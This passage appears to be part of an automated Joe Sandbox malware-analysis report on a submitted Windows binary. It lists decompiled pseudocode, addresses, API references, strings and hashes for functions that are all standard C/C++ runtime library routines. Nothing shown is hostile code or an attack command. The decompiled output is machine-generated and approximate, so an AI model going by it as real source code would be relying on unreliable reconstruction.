													_t257 = _t104;
													if(_t257 != 0x4f0570) {
														 *(_t181 - 4) = 0;
														 *((intOrPtr*)(_t181 - 0xc)) = _t276;
														 *((char*)(_t257 +  &(_v52[0xd]))) = 0;
													}
													_t183 =  *0x4f6394; // 0x4f6300
													_t277 =  *(_t183 + _t231);
													_t184 = strlen(_t277);
													_v136 = _t277;
													_v132 = _t184;
													L00473670(_t283);
													_t186 =  *_t283;
													_t299 = _t298 - 8;
													_t245 =  *((intOrPtr*)(_t186 - 0xc));
													_t278 = _t245 + 1;
													_v52 = _t245;
													if(_t278 <=  *((intOrPtr*)(_t186 - 8))) {
														if( *((intOrPtr*)(_t186 - 4)) > 0) {
															goto L51;
														} else {
															goto L52;
														}
														break;
													} else {
														L51:
														_v136 = _t278;
														E00474640(_t283);
														_t186 =  *_t283;
														_t299 = _t299 - 4;
													}
													L52:
													_t186[ *((intOrPtr*)(_t186 - 0xc))] = 0x3d;
													_t188 =  *_t283;
													_t113 = _t188 - 0xc; // -12
													_t260 = _t113;
													if(_t260 != 0x4f0570) {
														 *(_t188 - 4) = 0;
														 *((intOrPtr*)(_t188 - 0xc)) = _t278;
														 *((char*)(_t260 +  &(_v52[0xd]))) = 0;
													}
													_t279 =  *( *( *_v0 + 0x10) + _t231);
													_t193 = strlen(_t279);
													_v136 = _t279;
													_v132 = _t193;
													L00473670(_t283);
													_t231 =  &(_t231[4]);
													_t298 = _t299 - 8;
												} while (_t231 != 0x18);
												L54:
												return _t283;
											}
										}
									}
								} else {
									_v60 = _t202;
									_v64 = _t226;
									_t236 = _t282;
									E00499B70(_t236);
									_t290 = _t290 - 8;
									_t226 = 4;
									while(1) {
										_t280 = _t282[1];
										_v32 =  &(_t280[1]);
										_t205 =  *_t282;
										if(_v36 == _t205) {
											_t264 = 0xf;
										} else {
											_t264 = _t282[2];
										}
										if(_v32 > _t264) {
											_v52 = 1;
											_v56 = 0;
											_t236 = _t282;
											_v60 = 0;
											_v64 = _t280;
											E00499D40(_t236);
											_t290 = _t290 - 0x10;
											_t205 =  *_t282;
										}
										_t205[_t280] = 0x3b;
										_t282[1] =  &(_t280[1]);
										( *_t282)[ &(_t280[1])] = 0;
										_t209 =  *0x4f6394; // 0x4f6300
										_t271 =  *(_t209 + _t226);
										_t210 = strlen(_t271);
										if(_t210 > 0x7fffffff - _t282[1]) {
											break;
										}
										_v64 = _t210;
										_v68 = _t271;
										_t236 = _t282;
										E00499B70(_t236);
										_t281 = _t282[1];
										_t300 = _t290 - 8;
										_v32 =  &(_t281[1]);
										_t213 =  *_t282;
										if(_v36 == _t213) {
											_t267 = 0xf;
										} else {
											_t267 = _t282[2];
										}
										if(_v32 > _t267) {
											_v56 = 1;
											_v60 = 0;
											_t236 = _t282;
											_v64 = 0;
											_v68 = _t281;
											E00499D40(_t236);
											_t290 = _t300 - 0x10;
											_t213 =  *_t282;
										}
										_t213[_t281] = 0x3d;
										_t282[1] =  &(_t281[1]);
										( *_t282)[ &(_t281[1])] = 0;
										_t271 = ( *( *_a4 + 0x10))[_t226];
										 *_t290 = _t271;
										_t220 = strlen(??);
										if(_t220 > 0x7fffffff - _t282[1]) {
											 *_t290 = "basic_string::append";
											E004A57E0();
											_t270 =  *_t282;
											_t226 = _t220;
											if(_v36 != _t270) {
												 *_t290 = _t270;
												L004AB5B0();
											}
											 *_t290 = _t226;
											E0041EC30(_t220, _t226, _t270, _t271, _t282);
											break;
										} else {
											_v68 = _t220;
											 *_t290 = _t271;
											_t236 = _t282;
											E00499B70(_t236);
											_t226 =  &(_t226[4]);
											_t290 = _t290 - 8;
											if(_t226 != 0x18) {
												continue;
											} else {
												return _t282;
											}
										}
										goto L66;
									}
									_v68 = "basic_string::append";
									E004A57E0();
									goto L35;
								}
							}
						}
					}
				}
				L66:
			}

0x004364a1
0x004364a4
0x004364a9
0x004364ab
0x004364ae
0x004364b0
0x004364b6
0x004364ba
0x004364c3
0x004364c6
0x004364ca
0x004364cd
0x00436786
0x0043678e
0x00436796
0x0043679e
0x004367a5
0x00000000
0x004364d3
0x004364d8
0x00436690
0x00436690
0x00436696
0x0043669b
0x0043669f
0x004366a5
0x004366ad
0x004366b4
0x004366b9
0x004366c5
0x004364de
0x004364de
0x004364e9
0x004364ec
0x004364ef
0x004364f2
0x004364f6
0x004364f9
0x00436501
0x00436504
0x00000000
0x00000000
0x004364e7
0x00000000
0x00000000
0x00000000
0x004364e7
0x00436508
0x00000000
0x0043650e
0x0043650e
0x00436515
0x00436517
0x0043651c
0x00436521
0x00436524
0x00436526
0x00436529
0x00436538
0x004367e0
0x004367e0
0x004367e7
0x00000000
0x0043653e
0x0043653e
0x00436542
0x00436545
0x00436547
0x0043654c
0x0043654f
0x00436554
0x00436557
0x0043655a
0x0043677c
0x00436560
0x00436560
0x00436560
0x00436565
0x00436750
0x00436758
0x00436760
0x00436762
0x0043676a
0x0043676d
0x00436772
0x00436775
0x00436775
0x0043656b
0x00436571
0x00436574
0x00436581
0x00436586
0x00436595
0x004367ec
0x004367ec
0x004367f3
0x004367fe
0x00436800
0x00436801
0x00436803
0x00436804
0x00436805
0x00436806
0x00436808
0x0043680e
0x00436816
0x00436819
0x0043681d
0x00436820
0x00436a70
0x00436a75
0x00436a7d
0x00436a85
0x00436a8c
0x00436a90
0x00000000
0x00436826
0x0043682b
0x004369d0
0x004369d0
0x004369d6
0x004369db
0x004369de
0x004369e4
0x004369f5
0x00436831
0x00436831
0x00436834
0x00436844
0x00436844
0x00436847
0x0043684a
0x0043684d
0x00436851
0x00436854
0x0043685c
0x0043685f
0x00000000
0x00000000
0x00436842
0x00000000
0x00000000
0x00000000
0x00436842
0x00436863
0x00000000
0x00436869
0x00436869
0x00436872
0x00436877
0x0043687c
0x0043687f
0x00436881
0x00436884
0x00436889
0x0043688c
0x00436892
0x00436897
0x00436899
0x0043689c
0x0043689f
0x004368a5
0x00436a65
0x00000000
0x00436a6b
0x00000000
0x00436a6b
0x00000000
0x004368ab
0x004368ab
0x004368ab
0x004368b0
0x004368b5
0x004368b7
0x004368b7
0x004368ba
0x004368bd
0x004368c1
0x004368c3
0x004368cc
0x00436a9d
0x00436aa4
0x00436aa7
0x00436aa7
0x004368da
0x004368df
0x004368e4
0x004368e7
0x004368ed
0x004368f2
0x004368f5
0x004368fa
0x004368fa
0x004368fc
0x004368ff
0x00436905
0x00436908
0x00436a15
0x00000000
0x00436a1b
0x00000000
0x00436a1b
0x00000000
0x0043690e
0x0043690e
0x0043690e
0x00436913
0x00436918
0x0043691a
0x0043691a
0x0043691d
0x00436920
0x00436924
0x00436926
0x00436926
0x0043692f
0x00436a20
0x00436a27
0x00436a2d
0x00436a2d
0x00436935
0x0043693a
0x00436940
0x00436945
0x00436948
0x0043694e
0x00436953
0x00436955
0x00436958
0x0043695b
0x00436961
0x00436964
0x00436a05
0x00000000
0x00436a0b
0x00000000
0x00436a0b
0x00000000
0x0043696a
0x0043696a
0x0043696a
0x0043696f
0x00436974
0x00436976
0x00436976
0x00436979
0x0043697c
0x00436980
0x00436982
0x00436982
0x0043698b
0x00436a40
0x00436a47
0x00436a4d
0x00436a4d
0x00436999
0x0043699f
0x004369a4
0x004369a7
0x004369ad
0x004369b2
0x004369b5
0x004369b8
0x004369c1
0x004369ca
0x004369ca
0x00436863
0x0043682b
0x0043659b
0x0043659b
0x0043659f
0x004365a2
0x004365a4
0x004365a9
0x004365ac
0x004365b1
0x004365b1
0x004365b7
0x004365ba
0x004365bf
0x00436730
0x004365c5
0x004365c5
0x004365c5
0x004365cb
0x00436700
0x00436708
0x00436710
0x00436712
0x0043671a
0x0043671d
0x00436722
0x00436725
0x00436725
0x004365d1
0x004365d8
0x004365dd
0x004365e2
0x004365e7
0x004365ed
0x004365fc
0x00000000
0x00000000
0x00436602
0x00436606
0x00436609
0x0043660b
0x00436610
0x00436613
0x00436619
0x0043661c
0x00436621
0x00436740
0x00436627
0x00436627
0x00436627
0x0043662d
0x004366d0
0x004366d8
0x004366e0
0x004366e2
0x004366ea
0x004366ed
0x004366f2
0x004366f5
0x004366f5
0x00436633
0x0043663a
0x0043663f
0x0043664c
0x0043664f
0x00436652
0x00436661
0x004367af
0x004367b6
0x004367bb
0x004367c0
0x004367c2
0x004367c4
0x004367c7
0x004367c7
0x004367cc
0x004367cf
0x00000000
0x00436667
0x00436667
0x0043666b
0x0043666e
0x00436670
0x00436675
0x00436678
0x0043667e
0x00000000
0x00436684
0x0043668d
0x0043668d
0x0043667e
0x00000000
0x00436661
0x004367d4
0x004367db
0x00000000
0x004367db
0x00436595
0x00436538
0x00436508
0x004364d8
0x00000000

APIs

strcmp.MSVCRT ref: 004364F9
strlen.MSVCRT ref: 00436529
strlen.MSVCRT ref: 00436586
strlen.MSVCRT ref: 004365ED
strlen.MSVCRT ref: 00436652
strlen.MSVCRT ref: 00436696

Strings

basic_string::append, xrefs: 004367AF, 004367D4, 004367E0, 004367EC
*, xrefs: 00436786

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 1a1a3da6eb4d93d64a83e13746ef0796e30cd370aad5641f002ca6c3b3fe77bb
Instruction ID: 3ec927a0c19a44dc664e541155c6981a3c28670a4dea4267400fd9859b13bce3
Opcode Fuzzy Hash: 1a1a3da6eb4d93d64a83e13746ef0796e30cd370aad5641f002ca6c3b3fe77bb
Instruction Fuzzy Hash: 78E146B4A04705DFC710EF29C48462EFBE2EF88344F51C96EE8958B351D739A845CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004D611B Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004D6154
___free_lconv_mon.LIBCMT ref: 004D615F

Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5D15
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5D27
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5D39
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5D4B
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5D5D
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5D6F
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5D81
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5D93
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5DA5
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5DB7
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5DC9
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5DDB
Part of subcall function 004D5CF8: _free.LIBCMT ref: 004D5DED

_free.LIBCMT ref: 004D6176
_free.LIBCMT ref: 004D618B
_free.LIBCMT ref: 004D6196
_free.LIBCMT ref: 004D61B8
_free.LIBCMT ref: 004D61CB
_free.LIBCMT ref: 004D61D9
_free.LIBCMT ref: 004D61E4
_free.LIBCMT ref: 004D621C
_free.LIBCMT ref: 004D6223
_free.LIBCMT ref: 004D6240
_free.LIBCMT ref: 004D6258

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: ac80b9a0304b14fb56cd6a5416729651f37c40709158871f4e7a19a009ee04ac
Instruction ID: ae6bc186b09831e7528380d99d6c3133d577c8d010bf005a07e3d1e0273b4160
Opcode Fuzzy Hash: ac80b9a0304b14fb56cd6a5416729651f37c40709158871f4e7a19a009ee04ac
Instruction Fuzzy Hash: F2316D35A006019BDB206A79D856F5B73E9AB00354F22482FF458D6352EF3CFC448A18

Uniqueness

Uniqueness Score: -1.00%

Function 00420180 Relevance: 15.1, APIs: 10, Instructions: 132synchronizationCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32 ref: 004201B8
InterlockedDecrement.KERNEL32 ref: 00420260
ReleaseSemaphore.KERNEL32 ref: 00420286
abort.MSVCRT ref: 00420292
InterlockedDecrement.KERNEL32 ref: 004202A7
InterlockedIncrement.KERNEL32 ref: 004202C7
WaitForSingleObject.KERNEL32 ref: 00420320
InterlockedDecrement.KERNEL32 ref: 00420337
free.MSVCRT ref: 0042034F

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$Increment$ObjectReleaseSemaphoreSingleWaitabortfree
String ID:
API String ID: 3320833293-0
Opcode ID: d4429929eb32d76c790c757582b73b4a98c023aa34d9c926b39c18d56b6527b5
Instruction ID: 96a2097ee59e2b56e4e965dffaa7f11d6535c6bbd84257e9ca23740edaad095b
Opcode Fuzzy Hash: d4429929eb32d76c790c757582b73b4a98c023aa34d9c926b39c18d56b6527b5
Instruction Fuzzy Hash: C7416D71704220CBDB14EFA5B58932B77E4AB10344F8585AFDC848B317D779EC4986BA

Uniqueness

Uniqueness Score: -1.00%

Function 004D03CA Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004D03E0
_free.LIBCMT ref: 004D03EC
_free.LIBCMT ref: 004D03F7
_free.LIBCMT ref: 004D0402
_free.LIBCMT ref: 004D040D
_free.LIBCMT ref: 004D0418
_free.LIBCMT ref: 004D0423
_free.LIBCMT ref: 004D042E
_free.LIBCMT ref: 004D0439
_free.LIBCMT ref: 004D0447

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 48a35d0294ca17e8e0444af33e3c47b40be5aca968102de6fceb2b8609402ce3
Instruction ID: ddeec8e5c29e84e780b843238c46a971b4061bb5b88939ed643d5af21b27b4b0
Opcode Fuzzy Hash: 48a35d0294ca17e8e0444af33e3c47b40be5aca968102de6fceb2b8609402ce3
Instruction Fuzzy Hash: FC21A07A900108AFCB41EF99C862DDE7BB5FF08344F51856BF5199B121EB39EA44CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004889A0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 115
filestringCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E004889A0(unsigned int* __ecx, void* __eflags, intOrPtr _a4) {
				char** _v0;
				void* _v20;
				intOrPtr _v40;
				char* _v44;
				char* _v80;
				void* __edi;
				void* _t15;
				void* _t20;
				void* _t21;
				char* _t22;
				struct _IO_FILE* _t23;
				void* _t25;
				unsigned int _t32;
				unsigned int* _t34;
				char* _t35;
				unsigned int _t40;
				signed int _t44;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				char* _t52;
				char* _t55;
				unsigned int _t56;
				void* _t59;
				char** _t61;
				char** _t62;
				char** _t63;

				_t34 = __ecx;
				_v44 = "mt19937";
				_t15 = E00430A30(_a4);
				_t61 = _t59 - 0x20;
				_t40 = 0x1571;
				if(_t15 != 0) {
					_t55 =  *_v0;
					_v40 = 0;
					_v44 =  &_v20;
					 *_t61 = _t55;
					_t40 = strtoul(??, ??, ??);
					if( *_t55 == 0 ||  *_v20 != 0) {
						 *_t61 = "random_device::random_device(const std::string&)";
						E004A5B90(_t46, _t52);
						_push(_t52);
						_push(_t55);
						_t56 = _t40;
						_push(_t34);
						_t62 = _t61 - 0x10;
						_t35 = _v44;
						 *_t62 = "default";
						_t20 = E00430A30(_t35);
						_t63 = _t62 - 4;
						if(_t20 != 0) {
							_t52 =  *_t35;
							_v80 = "/dev/urandom";
							_t21 = E00430A30(_t35);
							_t63 = _t63 - 4;
							if(_t21 != 0) {
								 *_t63 = "/dev/random";
								_t25 = E00430A30(_t35);
								_t63 = _t63 - 4;
								if(_t25 != 0) {
									goto L14;
								}
							}
							goto L15;
						} else {
							asm("pushfd");
							asm("pushfd");
							_pop(_t47);
							_t44 = _t47;
							_push(_t47 ^ 0x00200000);
							asm("popfd");
							asm("pushfd");
							_pop(_t49);
							asm("popfd");
							_t46 = (_t49 ^ _t44) & 0x00200000;
							if(((_t49 ^ _t44) & 0x00200000) != 0) {
								asm("cpuid");
								if(_t35 != 0x756e6547 || _t20 == 0) {
									goto L9;
								} else {
									asm("cpuid");
									_t22 = "/dev/urandom";
									if((_t44 & 0x40000000) == 0) {
										goto L10;
									} else {
										 *_t56 = 0;
									}
								}
							} else {
								L9:
								_t22 = "/dev/urandom";
								L10:
								_v80 = "rb";
								 *_t63 = _t22;
								_t23 = fopen(??, ??);
								 *_t56 = _t23;
								if(_t23 == 0) {
									L14:
									 *_t63 = "random_device::random_device(const std::string&)";
									E004A5B90(_t46, _t52);
									L15:
									_t22 = _t52;
									goto L10;
								}
							}
						}
						return _t23;
					} else {
						goto L1;
					}
				} else {
					L1:
					 *_t34 = _t40;
					_t51 = 1;
					while(1) {
						_t32 = (_t40 >> 0x0000001e ^ _t40) * 0x6c078965 + _t51;
						_t34[_t51] = _t32;
						_t51 = _t51 + 1;
						if(_t51 == 0x270) {
							break;
						}
						_t40 =  *(_t34 + _t51 * 4 - 4);
					}
					_t34[0x270] = 0x270;
					return _t32;
				}
			}

0x004889a2
0x004889ab
0x004889b2
0x004889b7
0x004889bc
0x004889c1
0x00488a07
0x00488a0d
0x00488a15
0x00488a19
0x00488a24
0x00488a26
0x00488a31
0x00488a38
0x00488a40
0x00488a41
0x00488a42
0x00488a44
0x00488a45
0x00488a48
0x00488a4c
0x00488a55
0x00488a5a
0x00488a5f
0x00488aa0
0x00488aa4
0x00488aab
0x00488ab0
0x00488ab5
0x00488ab7
0x00488ac0
0x00488ac5
0x00488aca
0x00000000
0x00000000
0x00488aca
0x00000000
0x00488a61
0x00488a61
0x00488a62
0x00488a63
0x00488a64
0x00488a6c
0x00488a6d
0x00488a6e
0x00488a6f
0x00488a70
0x00488a73
0x00488a79
0x00488ae4
0x00488aec
0x00000000
0x00488af2
0x00488af7
0x00488aff
0x00488b04
0x00000000
0x00488b0a
0x00488b0a
0x00488b0a
0x00488b04
0x00488a7b
0x00488a7b
0x00488a7b
0x00488a80
0x00488a80
0x00488a88
0x00488a8b
0x00488a92
0x00488a94
0x00488acc
0x00488acc
0x00488ad3
0x00488ae0
0x00488ae0
0x00000000
0x00488ae0
0x00488a94
0x00488a79
0x00488a9c
0x00000000
0x00000000
0x00000000
0x004889c3
0x004889c3
0x004889c3
0x004889c5
0x004889d4
0x004889e1
0x004889e3
0x004889e6
0x004889ef
0x00000000
0x00000000
0x004889d0
0x004889d0
0x004889f1
0x00488a00
0x00488a00

APIs

Part of subcall function 00430A30: strlen.MSVCRT ref: 00430A43
Part of subcall function 00430A30: memcmp.MSVCRT ref: 00430A5F

strtoul.MSVCRT ref: 00488A1C
fopen.MSVCRT ref: 00488A8B

Strings

/dev/urandom, xrefs: 00488A7B, 00488AA4, 00488AFF
random_device::random_device(const std::string&), xrefs: 00488A31, 00488ACC
/dev/random, xrefs: 00488AB7
Genu, xrefs: 00488AE6
mt19937, xrefs: 004889AB
default, xrefs: 00488A4C

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: fopenmemcmpstrlenstrtoul
String ID: /dev/random$/dev/urandom$Genu$default$mt19937$random_device::random_device(const std::string&)
API String ID: 316402028-509307977
Opcode ID: 8ecb5f5ac05606960b43268dab421224e4d2a99c617c4989df8a0159d5e65486
Instruction ID: babd91e589e257cf00c3f4ce841f2d9ba8a5371ba5e9b02329fb7b52fe71197b
Opcode Fuzzy Hash: 8ecb5f5ac05606960b43268dab421224e4d2a99c617c4989df8a0159d5e65486
Instruction Fuzzy Hash: 7D31B5F06082058BDB18BE25989173F76D5AB94300F54887FD8C287381DBBCD945C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0042E0DB Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 33
fileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0042E0DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _t10;
				intOrPtr* _t16;
				char* _t17;
				void* _t22;
				void* _t25;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				char** _t32;

				 *_t32 = _t10;
				if(_t25 != 1) {
					L004AB7D0(_t22, _t28, _t29, _t31);
					L004AB9D0(_t28, _t29, _t31);
				} else {
					_t16 = L004AB7D0(_t22, _t28, _t29, _t31);
					_t30 = _t29 + 0x40;
					_t17 =  *((intOrPtr*)( *_t16 + 8))();
					_a12 = _t30;
					_a8 = 0xb;
					_a4 = 1;
					 *_t32 = "  what():  ";
					fwrite(??, ??, ??, ??);
					_a4 = _t30;
					 *_t32 = _t17;
					fputs(??, ??);
					_a4 = _t30;
					 *_t32 = 0xa;
					fputc(??, ??);
					L004AB9D0(_t28, _t30, _t31);
				}
				L2:
				abort();
				_a8 = 0x2d;
				_a4 = 1;
				 *_t32 = "terminate called without an active exception\n";
				_a12 = __imp___iob + 0x40;
				fwrite(??, ??, ??, ??);
				goto L2;
			}

0x0042e0de
0x0042e0e1
0x0042e168
0x0042e16d
0x0042e0e7
0x0042e0e7
0x0042e0ee
0x0042e0f3
0x0042e0f6
0x0042e0fc
0x0042e104
0x0042e10c
0x0042e113
0x0042e118
0x0042e11c
0x0042e11f
0x0042e124
0x0042e128
0x0042e12f
0x0042e134
0x0042e134
0x0042e139
0x0042e139
0x0042e143
0x0042e14b
0x0042e153
0x0042e15d
0x0042e161
0x00000000

APIs

fwrite.MSVCRT ref: 0042E113
fputs.MSVCRT ref: 0042E11F
fputc.MSVCRT ref: 0042E12F
abort.MSVCRT ref: 0042E139
fwrite.MSVCRT ref: 0042E161

Strings

what(): , xrefs: 0042E10C
terminate called without an active exception, xrefs: 0042E153
-, xrefs: 0042E143

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: fwrite$abortfputcfputs
String ID: what(): $-$terminate called without an active exception
API String ID: 631181824-3481984820
Opcode ID: f0063fa02fed37a1dfa16599104c724d5d228d1bffd500ed59225b0c0d035cf8
Instruction ID: 355effd045a8e5a3ff6371c84a5d7be159b2367844f8e3d7d40f91020356b61d
Opcode Fuzzy Hash: f0063fa02fed37a1dfa16599104c724d5d228d1bffd500ed59225b0c0d035cf8
Instruction Fuzzy Hash: 99019AB0609314DAD300BF66E04922EBBE0EF95748F40895FE5C54B206DBBD98449B97

Uniqueness

Uniqueness Score: -1.00%

Function 004CA030 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004CA067
___except_validate_context_record.LIBVCRUNTIME ref: 004CA06F
_ValidateLocalCookies.LIBCMT ref: 004CA0F8
__IsNonwritableInCurrentImage.LIBCMT ref: 004CA123
_ValidateLocalCookies.LIBCMT ref: 004CA178

Strings

csm, xrefs: 004CA10D
csm, xrefs: 004CA1A1

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
